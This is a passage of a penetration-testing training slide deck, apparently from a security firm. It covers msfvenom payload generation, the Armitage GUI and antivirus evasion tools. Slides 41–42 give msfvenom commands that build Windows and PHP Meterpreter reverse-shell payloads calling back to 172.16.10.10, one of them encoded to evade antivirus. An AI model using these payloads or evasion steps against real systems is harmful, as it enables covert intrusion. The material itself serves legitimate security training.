  • 41. www.prismacsi.com © All Rights Reserved. 41 Msfvenom Use • Msfvenom basic commands • msfvenom -h • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337-f exe > shell.exe • msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.10. lport=4444 -f raw > exp.php • msfvenom - p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=4444 -f war -a x86
  • 42. www.prismacsi.com © All Rights Reserved. 42 Msfvenom AV Evasion- Demonstration • msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.10.10 lport=1337 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe
  • 43. www.prismacsi.com © All Rights Reserved. 43 Msfvenom Help
  • 44. www.prismacsi.com © All Rights Reserved. 44 Msfvenom PHP Payload Contents
  • 45. www.prismacsi.com © All Rights Reserved. 45 Download Metasploit Additional Plugins • https://github.com/darkoperator/Metasploit-Plugins
  • 46. www.prismacsi.com © All Rights Reserved. 46 Loading Metasploit Features • Files are added manually under ~/.msf4/plugin/
  • 47. www.prismacsi.com © All Rights Reserved. 47 Armitage Use • Metasploit Framework GUI • Used to perform actions quickly • The interface is a little easier to use compared to the console application
  • 48. www.prismacsi.com © All Rights Reserved. 48 Armitage Use • Adding a host
  • 49. www.prismacsi.com © All Rights Reserved. 49 Armitage Use • Host scanning
  • 50. www.prismacsi.com © All Rights Reserved. 50 Armitage Use • Scan Results
  • 51. www.prismacsi.com © All Rights Reserved. 51 Armitage Use • Finding an attack vector
  • 52. www.prismacsi.com © All Rights Reserved. 52 Armitage Use • Java_rmi_attack
  • 53. www.prismacsi.com © All Rights Reserved. 53 Armitage Use • Java_rmi_attack • Meterpreter session
  • 54. www.prismacsi.com © All Rights Reserved. 54 Antivirus Evasion Tools • An antivirus mechanism may be found in target systems. • In this case the attacks should be performed with much more caution. • There are tools developed to bypass antiviruses. • Used tools • Veil-Evasion • Shellter • Av0id • Msfvenom
  • 55. www.prismacsi.com © All Rights Reserved. 55 Veil-Evasion Installation
  • 56. www.prismacsi.com © All Rights Reserved. 56 Veil-Evasion Payload Selection
  • 57. www.prismacsi.com © All Rights Reserved. 57 Veil-Evasion Payload Configuration
  • 58. www.prismacsi.com © All Rights Reserved. 58 Veil-Evasion Payload Creation - DEMO
  • 59. www.prismacsi.com © All Rights Reserved. 59 Virustotal Scanning
  • 60. www.prismacsi.com © All Rights Reserved. 60 Shellter Installation
  • 61. www.prismacsi.com © All Rights Reserved. 61 Shellter Use – DEMO
  • 62. www.prismacsi.com © All Rights Reserved. 62 Virustotal Scanning
  • 63. www.prismacsi.com © All Rights Reserved. 63 Applications
  • 64. www.prismacsi.com © All Rights Reserved. 64 Questions?
  • 65. www.prismacsi.com © All Rights Reserved. 65 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi Contacts